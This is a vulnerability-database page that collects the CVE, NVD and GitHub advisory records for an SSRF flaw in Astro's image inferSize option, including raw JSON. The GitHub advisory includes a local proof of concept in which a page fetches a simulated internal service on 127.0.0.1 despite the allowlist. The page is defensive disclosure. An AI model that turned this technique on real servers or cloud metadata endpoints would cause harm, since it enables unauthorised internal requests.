Vulnerability-Lookup

CVE-2026-27829 (GCVE-0-2026-27829)

Vulnerability from cvelistv5 – Published: 2026-02-26 00:36 – Updated: 2026-02-26 16:21

Title

Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize

Summary

Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro's image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue.

Severity ?

6.5 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

GitHub_M

References

URL

Tags

	https://github.com/withastro/astro/security/advis…	x_refsource_CONFIRM
	https://github.com/withastro/astro/commit/e01e98b…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	withastro	astro	Affected: >= 9.0.0, < 9.5.4

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-27829",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-26T16:21:28.348418Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-26T16:21:44.676Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "astro",
          "vendor": "withastro",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 9.0.0, \u003c 9.5.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918: Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-02-26T00:36:40.497Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2"
        },
        {
          "name": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9"
        }
      ],
      "source": {
        "advisory": "GHSA-cj9f-h6r6-4cx2",
        "discovery": "UNKNOWN"
      },
      "title": "Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-27829",
    "datePublished": "2026-02-26T00:36:40.497Z",
    "dateReserved": "2026-02-24T02:32:39.800Z",
    "dateUpdated": "2026-02-26T16:21:44.676Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-27829",
      "date": "2026-04-15",
      "epss": "0.00073",
      "percentile": "0.22198"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-27829\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-02-26T01:16:24.390\",\"lastModified\":\"2026-03-09T20:47:35.170\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue.\"},{\"lang\":\"es\",\"value\":\"Astro es un framework web. En las versiones 9.0.0 a 9.5.3, un error en la pipeline de im\u00e1genes de Astro permite eludir las restricciones de `image.domains` / `image.remotePatterns`, lo que permite al servidor obtener contenido de hosts remotos no autorizados. Astro proporciona una opci\u00f3n `inferSize` que obtiene im\u00e1genes remotas en el momento de la renderizaci\u00f3n para determinar sus dimensiones. La obtenci\u00f3n de im\u00e1genes remotas est\u00e1 destinada a restringirse a dominios que el desarrollador del sitio ha autorizado manualmente (utilizando las opciones `image.domains` o `image.remotePatterns`). Sin embargo, cuando se utiliza `inferSize`, no se realiza ninguna validaci\u00f3n de dominio \u2014 la imagen se obtiene de cualquier host independientemente de las restricciones configuradas. Un atacante que puede influir en la URL de la imagen (por ejemplo, a trav\u00e9s de contenido de CMS o datos proporcionados por el usuario) puede hacer que el servidor obtenga contenido de hosts arbitrarios. Esto permite eludir las restricciones de `image.domains` / `image.remotePatterns` para realizar peticiones del lado del servidor a hosts no autorizados. Esto incluye el riesgo de falsificaci\u00f3n de petici\u00f3n del lado del servidor (SSRF) contra servicios de red internos y puntos finales de metadatos en la nube. La versi\u00f3n 9.5.4 corrige el problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\",\"baseScore\":6.5,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":2.5},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":3.9,\"impactScore\":2.7}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:astro:\\\\@astrojs\\\\/node:*:*:*:*:*:node.js:*:*\",\"versionStartIncluding\":\"9.0.0\",\"versionEndExcluding\":\"9.5.4\",\"matchCriteriaId\":\"4544AFCE-A719-4079-859C-E356B5871A4C\"}]}]}],\"references\":[{\"url\":\"https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}"
  }
}

FKIE_CVE-2026-27829

Vulnerability from fkie_nvd - Published: 2026-02-26 01:16 - Updated: 2026-03-09 20:47

Severity ?

6.5 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9	Patch
	security-advisories@github.com	https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	astro	\@astrojs\/node	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:astro:\\@astrojs\\/node:*:*:*:*:*:node.js:*:*",
              "matchCriteriaId": "4544AFCE-A719-4079-859C-E356B5871A4C",
              "versionEndExcluding": "9.5.4",
              "versionStartIncluding": "9.0.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Astro is a web framework. In versions 9.0.0 through 9.5.3, a bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts. Astro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options). However, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts. This allows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints. Version 9.5.4 fixes the issue."
    },
    {
      "lang": "es",
      "value": "Astro es un framework web. En las versiones 9.0.0 a 9.5.3, un error en la pipeline de im\u00e1genes de Astro permite eludir las restricciones de `image.domains` / `image.remotePatterns`, lo que permite al servidor obtener contenido de hosts remotos no autorizados. Astro proporciona una opci\u00f3n `inferSize` que obtiene im\u00e1genes remotas en el momento de la renderizaci\u00f3n para determinar sus dimensiones. La obtenci\u00f3n de im\u00e1genes remotas est\u00e1 destinada a restringirse a dominios que el desarrollador del sitio ha autorizado manualmente (utilizando las opciones `image.domains` o `image.remotePatterns`). Sin embargo, cuando se utiliza `inferSize`, no se realiza ninguna validaci\u00f3n de dominio \u2014 la imagen se obtiene de cualquier host independientemente de las restricciones configuradas. Un atacante que puede influir en la URL de la imagen (por ejemplo, a trav\u00e9s de contenido de CMS o datos proporcionados por el usuario) puede hacer que el servidor obtenga contenido de hosts arbitrarios. Esto permite eludir las restricciones de `image.domains` / `image.remotePatterns` para realizar peticiones del lado del servidor a hosts no autorizados. Esto incluye el riesgo de falsificaci\u00f3n de petici\u00f3n del lado del servidor (SSRF) contra servicios de red internos y puntos finales de metadatos en la nube. La versi\u00f3n 9.5.4 corrige el problema."
    }
  ],
  "id": "CVE-2026-27829",
  "lastModified": "2026-03-09T20:47:35.170",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 6.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 7.2,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2026-02-26T01:16:24.390",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-CJ9F-H6R6-4CX2

Vulnerability from github – Published: 2026-02-25 18:11 – Updated: 2026-02-27 21:53

Summary

Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize

Details

Summary

A bug in Astro's image pipeline allows bypassing image.domains / image.remotePatterns restrictions, enabling the server to fetch content from unauthorized remote hosts.

Details

Astro provides an inferSize option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the image.domains or image.remotePatterns options).

However, when inferSize is used, no domain validation is performed — the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.

PoC

### Setup Create a new Astro project with the following files: `package.json`:

{
  "name": "poc-ssrf-infersize",
  "private": true,
  "scripts": {
    "dev": "astro dev --port 4322",
    "build": "astro build"
  },
  "dependencies": {
    "astro": "5.17.2",
    "@astrojs/node": "9.5.3"
  }
}

`astro.config.mjs` — only `localhost:9000` is authorized:

import { defineConfig } from 'astro/config';
import node from '@astrojs/node';

export default defineConfig({
  output: 'server',
  adapter: node({ mode: 'standalone' }),
  image: {
    remotePatterns: [
      { hostname: 'localhost', port: '9000' }
    ]
  }
});

`internal-service.mjs` — simulates an internal service on a non-allowlisted host (`127.0.0.1:8888`):

import { createServer } from 'node:http';
const GIF = Buffer.from('R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==', 'base64');
createServer((req, res) => {
  console.log(`[INTERNAL] Received: ${req.method} ${req.url}`);
  res.writeHead(200, { 'Content-Type': 'image/gif', 'Content-Length': GIF.length });
  res.end(GIF);
}).listen(8888, '127.0.0.1', () => console.log('Internal service on 127.0.0.1:8888'));

`src/pages/test.astro`:

---
import { getImage } from 'astro:assets';

const result = await getImage({
  src: 'http://127.0.0.1:8888/internal-api',
  inferSize: true,
  alt: 'test'
});
---
<html><body>
  <p>Width: {result.options.width}, Height: {result.options.height}</p>
</body></html>

### Steps to reproduce 1. Run `npm install` and start the internal service:

node internal-service.mjs

2. Start the dev server:

npm run dev

3. Request the page:

curl http://localhost:4322/test

4. `internal-service.mjs` logs `Received: GET /internal-api` — the request was sent to `127.0.0.1:8888` despite only `localhost:9000` being in the allowlist.

Impact

Allows bypassing image.domains / image.remotePatterns restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.

Severity ?

6.5 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@astrojs/node"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "9.0.0"
            },
            {
              "fixed": "9.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27829"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:11:47Z",
    "nvd_published_at": "2026-02-26T01:16:24Z",
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nA bug in Astro\u0027s image pipeline allows bypassing `image.domains` / `image.remotePatterns` restrictions, enabling the server to fetch content from unauthorized remote hosts.\n\n## Details\n\nAstro provides an `inferSize` option that fetches remote images at render time to determine their dimensions. Remote image fetches are intended to be restricted to domains the site developer has manually authorized (using the `image.domains` or `image.remotePatterns` options).\n\nHowever, when `inferSize` is used, no domain validation is performed \u2014 the image is fetched from any host regardless of the configured restrictions. An attacker who can influence the image URL (e.g., via CMS content or user-supplied data) can cause the server to fetch from arbitrary hosts.\n\n## PoC\n\n\u003cdetails\u003e\n\n### Setup\n\nCreate a new Astro project with the following files:\n\n`package.json`:\n```json\n{\n  \"name\": \"poc-ssrf-infersize\",\n  \"private\": true,\n  \"scripts\": {\n    \"dev\": \"astro dev --port 4322\",\n    \"build\": \"astro build\"\n  },\n  \"dependencies\": {\n    \"astro\": \"5.17.2\",\n    \"@astrojs/node\": \"9.5.3\"\n  }\n}\n```\n\n`astro.config.mjs` \u2014 only `localhost:9000` is authorized:\n```javascript\nimport { defineConfig } from \u0027astro/config\u0027;\nimport node from \u0027@astrojs/node\u0027;\n\nexport default defineConfig({\n  output: \u0027server\u0027,\n  adapter: node({ mode: \u0027standalone\u0027 }),\n  image: {\n    remotePatterns: [\n      { hostname: \u0027localhost\u0027, port: \u00279000\u0027 }\n    ]\n  }\n});\n```\n\n`internal-service.mjs` \u2014 simulates an internal service on a non-allowlisted host (`127.0.0.1:8888`):\n```javascript\nimport { createServer } from \u0027node:http\u0027;\nconst GIF = Buffer.from(\u0027R0lGODlhAQABAIAAAP///wAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==\u0027, \u0027base64\u0027);\ncreateServer((req, res) =\u003e {\n  console.log(`[INTERNAL] Received: ${req.method} ${req.url}`);\n  res.writeHead(200, { \u0027Content-Type\u0027: \u0027image/gif\u0027, \u0027Content-Length\u0027: GIF.length });\n  res.end(GIF);\n}).listen(8888, \u0027127.0.0.1\u0027, () =\u003e console.log(\u0027Internal service on 127.0.0.1:8888\u0027));\n```\n\n`src/pages/test.astro`:\n```astro\n---\nimport { getImage } from \u0027astro:assets\u0027;\n\nconst result = await getImage({\n  src: \u0027http://127.0.0.1:8888/internal-api\u0027,\n  inferSize: true,\n  alt: \u0027test\u0027\n});\n---\n\u003chtml\u003e\u003cbody\u003e\n  \u003cp\u003eWidth: {result.options.width}, Height: {result.options.height}\u003c/p\u003e\n\u003c/body\u003e\u003c/html\u003e\n```\n\n### Steps to reproduce\n\n1. Run `npm install` and start the internal service:\n\n```bash\nnode internal-service.mjs\n```\n\n2. Start the dev server:\n\n```bash\nnpm run dev\n```\n\n3. Request the page:\n\n```bash\ncurl http://localhost:4322/test\n```\n\n4. `internal-service.mjs` logs `Received: GET /internal-api` \u2014 the request was sent to `127.0.0.1:8888` despite only `localhost:9000` being in the allowlist.\n\n\u003c/details\u003e\n\n## Impact\n\nAllows bypassing `image.domains` / `image.remotePatterns` restrictions to make server-side requests to unauthorized hosts. This includes the risk of server-side request forgery (SSRF) against internal network services and cloud metadata endpoints.",
  "id": "GHSA-cj9f-h6r6-4cx2",
  "modified": "2026-02-27T21:53:27Z",
  "published": "2026-02-25T18:11:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/withastro/astro/security/advisories/GHSA-cj9f-h6r6-4cx2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27829"
    },
    {
      "type": "WEB",
      "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/withastro/astro"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Astro is vulnerable to SSRF due to missing allowlist enforcement in remote image inferSize"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-27829 (GCVE-0-2026-27829)

FKIE_CVE-2026-27829

GHSA-CJ9F-H6R6-4CX2

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature